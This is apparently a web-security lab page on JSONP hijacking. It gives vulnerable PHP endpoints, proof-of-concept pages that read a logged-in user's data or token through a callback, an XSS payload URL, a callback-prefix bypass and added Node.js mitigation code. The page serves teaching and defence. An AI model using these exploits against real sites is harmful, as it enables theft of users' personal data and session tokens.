
JSONP

Vulnerable Code

<?php
session_start();

if (!isset($_SESSION['islogin']) || $_SESSION['islogin'] != 1) {
    header("Location: login.php");
    die();
}

?>
<html>
  <head>
    <title>Books Library</title>
    <link rel="stylesheet" type="text/css" href="../style/css.css">
  </head>
  <body id="bodyId">
    <div class="header">
      <a href="index.php" class="logo">Books Library</a>
      <div class="header-right">
        <a href="index.php">Home</a>
        <a class="active" href="profile.php">Profile</a>
        <a href="login.php">Login</a>
      </div>
    </div>
    <div id="output">
    </div>
    <div class="container">
      <script type="text/javascript">
        // Callback invoked by the JSONP response; the fields are written to the page
        // with innerHTML exactly as the endpoint returned them
        function userInfo(data){
          var name = '<center><span>User Name: '+data["username"]+'</span><br>',
              email = '<span>Email: '+data['email']+'</span><br>',
              fname = '<span>Full Name: '+data['Full Name']+'</span></center>';
          document.getElementById('output').innerHTML = name+email+fname;
        }
      </script>
      <script src="http://vuln.labs/labs/jsonp/info.php?callback=userInfo"></script>
    </div>
  </body>
</html>

POC

<script>
	// Any page that defines a function with the expected callback name and includes
	// the endpoint as a script receives the logged-in user's data
	function userInfo(data){
		document.write(JSON.stringify(data))
	}
</script>
<script src='http://localhost/labs/jsonp/info.php?callback=userInfo'></script>

Mitigation

Use CORS Instead of JSONP

Strict Callback Validation

<?php
header('Content-Type: application/javascript');

// Exact-match allowlist of callback names the endpoint will emit
$allowed_callbacks = ['safeFunction'];
$callback = isset($_GET['callback']) ? $_GET['callback'] : '';

// Strict comparison: only a string identical to an allowlisted name passes
if (in_array($callback, $allowed_callbacks, true)) {
    $data = [
        "name" => "John Doe",
        "email" => "john@example.com"
    ];

    echo $callback . '(' . json_encode($data) . ');';
} else {
    echo 'console.error("Invalid callback function.");';
}

JSONP Content-Type Validation

More Complex Scenarios

Scenario 1: Exploiting with Malicious Parameters

<?php
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$name = isset($_GET['name']) ? $_GET['name'] : 'John Doe';
$email = isset($_GET['email']) ? $_GET['email'] : 'john@example.com';

$data = [
    "name" => $name,
    "email" => $email
];

// Vulnerable JSONP response with user input
echo $callback . '(' . json_encode($data) . ');';

Exploit

http://localhost/vulnerable_server.php?callback=stealData&name=<script>alert('XSS')</script>&email=attacker@example.com

Result: XSS plus the JSONP data.

Scenario 2: Bypassing Weak Validation

<?php
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$allowed_callbacks = ['safeFunction'];

if (strpos($callback, 'safe') === 0) {
    $data = [
        "name" => "John Doe",
        "email" => "john@example.com"
    ];

    echo $callback . '(' . json_encode($data) . ');';
} else {
    echo 'console.error("Invalid callback function.");';
}

Exploit

http://vulnerable.com/vulnerable_server.php?callback=safeStealData
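The prefix check in Scenario 2 accepts any name that merely starts with "safe", and the endpoint in Scenario 1 reflects request parameters into the body unescaped. Both are closed by the two controls the Mitigation section names: an exact-match allowlist over a syntactically restricted callback name, and escaping of HTML-significant characters in the JSON payload, served with a fixed content type and a `nosniff` header. The following Node.js code is an added example written for this page; it is not code from the original page or from the lab. The `weakPrefixCheck` function reproduces the page's `strpos` test for comparison, and the allowlist and sample data are constructed values.

```javascript
// Added example (not from the original page): hardening a JSONP endpoint in Node.js.
// ALLOWED_CALLBACKS and the sample data objects are constructed for illustration.

// The page's weak check from Scenario 2, reproduced: strpos($callback, 'safe') === 0
function weakPrefixCheck(callback) {
  return typeof callback === 'string' && callback.indexOf('safe') === 0;
}

// Exact-match allowlist of callback names the endpoint is willing to emit
const ALLOWED_CALLBACKS = new Set(['safeFunction', 'userInfo']);
// A callback must be a plain JavaScript identifier of bounded length, nothing else
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;

function isSafeCallback(callback) {
  return typeof callback === 'string'
    && CALLBACK_RE.test(callback)
    && ALLOWED_CALLBACKS.has(callback);
}

// JSON.stringify leaves <, >, & and U+2028/U+2029 unescaped. Escaping them as \uXXXX
// keeps reflected values (Scenario 1) from forming tags if the body is ever treated as
// HTML, and keeps U+2028/2029 from terminating a JavaScript line inside the string.
function safeJsonStringify(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Builds the full response as a plain object so it can be checked without a server
function buildJsonpResponse(callback, data) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff', // browsers must not sniff the body as HTML
  };
  if (!isSafeCallback(callback)) {
    return { status: 400, headers, body: 'console.error("Invalid callback function.");' };
  }
  // The "/**/" prefix guarantees the response never begins with caller-chosen bytes
  return { status: 200, headers, body: `/**/${callback}(${safeJsonStringify(data)});` };
}

// Stand-alone demonstration with constructed input
const demoData = { name: 'John Doe', email: 'john@example.com' };
console.log('weak check accepts safeStealData:', weakPrefixCheck('safeStealData'));
console.log('strict check accepts safeStealData:', isSafeCallback('safeStealData'));
console.log(buildJsonpResponse('safeFunction', demoData).body);
```

`safeStealData` passes `weakPrefixCheck` but not `isSafeCallback`; the validated string is the exact string that is emitted, so there is no later decoding step that could change it after the check.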

Scenario 4: JSONP Hijacking via CORS Misconfiguration

CORS-Enabled Server

<?php
header('Access-Control-Allow-Origin: *'); // Wide open CORS policy
header('Content-Type: application/javascript');

$callback = $_GET['callback'];
$data = [
    "token" => "58rec269qs4a9w8ewd2a6ghy6", // Sensitive data
];

echo $callback . '(' . json_encode($data) . ');';

Exploit

<script>
function safeStealData(data) {
    console.log("Stolen token:", data.token);
    // Further actions like sending the token to the attacker's server
}
</script>
<script src="http://localhost/labs/jsonp/plus/vuln_server3.php?callback=safeStealData"></script>
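Two points about Scenario 4 from the defender's side. A `<script src>` load has never been subject to CORS, so the hijack above works with or without `Access-Control-Allow-Origin: *`; what the wildcard adds is that any origin can also read the raw body with `fetch()` or XHR. The fix the Mitigation section names, "Use CORS Instead of JSONP", therefore means serving plain JSON, which is not a valid script, and granting read access only to an allowlist of origins. The Node.js code below is an added example written for this page, not code from the original page or the lab; the allowlist, the placeholder token and the helper names are constructed.

```javascript
// Added example (not from the original page): a JSON endpoint with an Origin allowlist
// as the replacement for the CORS-enabled JSONP server in Scenario 4.
// ALLOWED_ORIGINS and SAMPLE_DATA are constructed values for illustration.

const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
const SAMPLE_DATA = { token: 'TOKEN_PLACEHOLDER' }; // stand-in for the page's token value

// The page's wide-open variant, as a plain JSON body: every origin may read it via fetch()/XHR
function buildWideOpenResponse(data) {
  return {
    status: 200,
    headers: { 'Access-Control-Allow-Origin': '*', 'Content-Type': 'application/json' },
    body: JSON.stringify(data),
  };
}

// Hardened variant: echo the request's Origin only when it is on the allowlist. Without an
// Access-Control-Allow-Origin header the browser withholds the body from a cross-origin reader.
function buildCorsJsonResponse(requestOrigin, data) {
  const headers = {
    'Content-Type': 'application/json; charset=utf-8',
    'X-Content-Type-Options': 'nosniff', // no MIME sniffing into a script type
    'Vary': 'Origin',                    // caches must not serve one origin's answer to another
  };
  if (requestOrigin !== undefined && ALLOWED_ORIGINS.has(requestOrigin)) {
    headers['Access-Control-Allow-Origin'] = requestOrigin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return { status: 200, headers, body: JSON.stringify(data) };
}

// Browser-side view of the CORS read check: a cross-origin fetch() may read the body
// only if the header is '*' or names the caller's own origin
function canOriginRead(requestOrigin, response) {
  const acao = response.headers['Access-Control-Allow-Origin'];
  return acao === '*' || acao === requestOrigin;
}

// Why plain JSON resists <script src> inclusion: an object literal at statement position
// parses as a block, and the first ':' is a syntax error, so the script never runs.
// new Function() only parses the text; nothing in it is executed.
function isExecutableAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Stand-alone demonstration with constructed input
console.log('wildcard readable by unlisted origin:',
  canOriginRead('https://evil.example', buildWideOpenResponse(SAMPLE_DATA)));
console.log('allowlisted JSON readable by unlisted origin:',
  canOriginRead('https://evil.example', buildCorsJsonResponse('https://evil.example', SAMPLE_DATA)));
console.log('JSON body runs as a script:',
  isExecutableAsScript(buildCorsJsonResponse('https://app.example.com', SAMPLE_DATA).body));
console.log('JSONP body runs as a script:',
  isExecutableAsScript('safeStealData({"token":"x"});'));
```

A caller that is not on the allowlist receives no `Access-Control-Allow-Origin` header at all, rather than a denial, which is how CORS expresses "not readable cross-origin"; same-origin requests are unaffected either way.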

Scenario 5: Advanced URL Manipulation

<?php
header('Content-Type: application/javascript');

$callback = urldecode($_GET['callback']);
$data = [
    "name" => "John Doe",
    "email" => "john@example.com"
];

echo $callback . '(' . json_encode($data) . ');';